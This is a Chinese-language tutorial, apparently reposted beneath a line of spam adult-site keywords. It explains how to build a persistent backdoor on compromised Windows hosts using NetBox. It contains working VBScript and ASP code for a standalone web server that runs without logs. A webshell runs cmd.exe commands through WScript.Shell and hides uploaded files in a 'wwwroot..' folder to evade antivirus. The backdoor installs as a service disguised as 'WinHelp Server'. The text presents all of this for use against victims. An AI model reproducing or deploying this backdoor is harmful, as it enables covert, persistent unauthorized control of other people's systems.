国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

Tags：Http后門(8)　　

　　以前寫的一篇文章，現(xiàn)在公布出來，對編程感興趣歡迎和我討論呵!

　　一、前言

　　在當(dāng)今當(dāng)?shù)赖哪甏?，找肉雞已經(jīng)不是什么難事，各種各樣的傻瓜工具大大方便了菜鳥們的，但是往往入侵成功了，怎么去做好后門，把肉雞盡可能久的抓住往往困惑著像我一樣的菜鳥們。用過無數(shù)網(wǎng)上經(jīng)典的后門后，在丟失了許多辛辛苦苦弄到的肉雞后，我下定決心要寫自己的后門。于是有了下面的文章。

　　二、Netbox簡介

　　一個偶然的機會，我認(rèn)識了Netbox。Netbox是一個使用腳本語言進行應(yīng)用軟件開發(fā)與發(fā)布的開發(fā)環(huán)境和運行平臺，使用 NetBox，可以完全使用腳本語言(比如 VBScript，Javascript) 創(chuàng)建出穩(wěn)定高效的應(yīng)用軟件，并且可以平滑移植到從 Windows 98 到 Windows .NET Server 的全部上。

　　它可以方便的將asp應(yīng)用編譯成為獨立運行的執(zhí)行程序，完全擺脫的束縛(將iis卸載后程序運行仍然正常)，在幾乎所有的Windows版本上面直接運行，完全不需要考慮平臺兼容性和對asp運行環(huán)境的要求。同時NetBox還提供大量擴展部件，使得WEB應(yīng)用更加方便。說了那么多，大家肯定很想見識見識這位帥哥吧，好。

　　三、一起動手

　　如果大家已經(jīng)對腳本語言VBScript或者Javascript有一點了解，那就可以跟我動手了。我們的任務(wù)是在建立一個與iis完全無關(guān)的，它可以為我們提供FSO的支持，以方便上傳文件。并支持腳本宿主WSH,這樣我們就能執(zhí)行命令了。在網(wǎng)站根目錄里我們可以放上自己的asp或其它的木馬后門并可以隨時執(zhí)行。

　　首先需要建立我們的web，這個服務(wù)器和IIS沒有任何關(guān)系，即使卸載了IIS它也可以運行。利用NetBox的HttpServer對象就能輕易的辦到。

　　在記事本里寫入如下幾行代碼：

　　Set httpd = CreateObject("NetBox.HttpServer")

　　*創(chuàng)建httpserver對象

　　If httpd.Create("", 8000) = 0 Then

　　*web服務(wù)端口設(shè)為8000，可以自己改，不要和其他端口沖突就行了。

　　Set host = httpd.AddHost("", "wwwroot")

　　*設(shè)置web服務(wù)的根目錄為文件夾"wwwroot"。

　　host.EnableScript = true

　　*使Web服務(wù)器能夠理解服務(wù)器端腳本程序，既支持asp。

　　host.AddDefault "default.asp"

　　host.AddDefault "default.htm"

　　host.AddDefault "index.asp"

　　host.AddDefault "index.htm"

　　host.AddDefault "default.html"

　　host.AddDefault "index.html"

　　*設(shè)置缺省文件，相當(dāng)與iis中的默認(rèn)文檔。

　　httpd.Start

　　*開始服務(wù)

　　else

　　httpd.Stop

　　Shell.Quit 0

　　End If

　　End Sub

　　將文件存為main.box。

　　這樣一個支持asp的服務(wù)器源代碼就寫成功了，它可以讓你的asp木馬隨心所欲的運行，而且不用擔(dān)心會有日志記錄，但是現(xiàn)在它還遠不是一個后門，只是提供了與IIS相當(dāng)?shù)墓δ?，為了防止后門被殺，我們不妨自己來寫一個簡單的CMD.ASP，當(dāng)然不是那個所謂的最簡短的asp后門了。我們要實現(xiàn)的功能是可以上傳文件和執(zhí)行命令。

　　這里只分析主要的代碼，詳細的代碼附在了軟件包里。

　　set pyeWSH=server.createobject("WSCRIPT.SHELL")

　　*建立shell(wshshell)對象pyeWSH

　　set pyeFSO=server.createobject("scripting.filesystemobject")

　　*建立文件系統(tǒng)對象pyeFSO用于文件方面的操作

　　szTempFile="C:"& pyeFSO.GetTempName()

　　*GetTempName()是fso建立臨時文件的一種方法

　　Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)

　　*調(diào)用wshshell的run方法來執(zhí)行命令，并把結(jié)果重定向到臨時文件中

　　set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0)

　　*以讀的方式打開臨時文件

　　思路應(yīng)該很清楚，我簡單說說。建立shell對象是用于執(zhí)行命令，建立文件系統(tǒng)對象是用于將命令執(zhí)行的結(jié)果輸入到一個臨時文件中并將文件內(nèi)容讀出來。要看到命令執(zhí)行的結(jié)果只要加上這樣一句：

　　response.write server.HTMLEncode(oFile.ReadAll)

　　就能讀出臨時文件的內(nèi)容并顯示出來。實現(xiàn)上傳文件功能的代碼也很簡單。

　　注意這里是將上傳的文件保存到了肉雞上的一個“wwwroot.”的文件夾下面，這個文件夾只能在CMD下面用mkdir wwwroot.. 建立。放在這個文件夾里的文件在一般情況下是看不到的，所以可以在一定程度上躲過的查殺，不過執(zhí)行的時候也要麻煩一點了，因為放在這里面的程序用shell對象的run方法運行不了的，因為根本找不到這個要執(zhí)行的文件。但奇怪的是可以將里面的文件copy到別的地方，所以需要執(zhí)行時就是先要將文件copy到其它目錄下，當(dāng)然啦這么簡單的事我們的后門完全可以做到。Asp后門就這樣做好了，很簡單吧?而且功能也不差，如果你夠懶的話，也可以直接用別人的Asp后門。

　　然后我們將Web服務(wù)器做成一個真正的服務(wù)，也就是可以隨系統(tǒng)一起啟動，只需要加上這樣一句：

　　Shell.Service.RunService "WinHelp Server"，"WinHelp Server"，"Windows Help service "

　　引號內(nèi)依次為服務(wù)名，服務(wù)顯示名，服務(wù)描述字符串，可以發(fā)揮想象自己改。

　　安裝服務(wù)的命令是：myapp -install，要注意的是這個命令只是將程序變成服務(wù)，并沒有運行，所以要馬上生效的話，就要輸入myapp.exe以執(zhí)行它。

　　卸載服務(wù)的命令是：myapp -remove，myapp表示文件的名稱。

　　四、編譯應(yīng)用程序

　　沒想到還有這一步吧?像一般的編譯程序一樣，源文件要變異了才能執(zhí)行，編譯需要使用工具Nbdw.exe，這個工具用于將NetBox 應(yīng)用發(fā)布成為獨立的應(yīng)用程序。

　　點擊選擇源文件夾，找到我們存放源文件的目錄，勾選要編譯的文件，在輸出文件里填上要生成的執(zhí)行文件名，如pyedoor.exe，點 Build...，開始編譯。

　　最后，我們得到了編譯成功的那個可執(zhí)行文件，使用時需要上傳到遠程主機上，執(zhí)行pyedoor -install，就將后門以服務(wù)方式運行了，訪問時只需在里輸入www.target.com:8000/cmd.asp就可以看到我們的木馬了。

　　相信熟悉網(wǎng)頁木馬的高手們不用我羅嗦了吧?但是要注意的是這個網(wǎng)頁木馬是將上傳的文件放在“wwwroot..”目錄下的，即使在command框里輸入dir wwwroot..也看不到上傳的文件，也執(zhí)行不了，目的在于防止被殺。那萬一需要執(zhí)行該怎么辦呢?聰明的你肯定想到了吧，對了，只要copy“wwroot..”目錄下的文件到別的文件夾下就行了。怎么樣很簡單吧?原來擁有自己的后門這么容易。

　　為了方便大家使用我把做好的后門，做成了自解壓文件，里面有必需的源文件，還有一個配合后門的批處理。使用時只需把這個自解壓文件上傳到遠程主機上執(zhí)行就可以了。

　　五、自我總結(jié)

　　Netbox是一個新工具，本來不是為服務(wù)的，但我們可以拿來，它還有很多值得開發(fā)的功能，很希望和大家一起研究。另外就是不要覺得編程之類的很復(fù)雜，只要有信心沒有辦不成的事。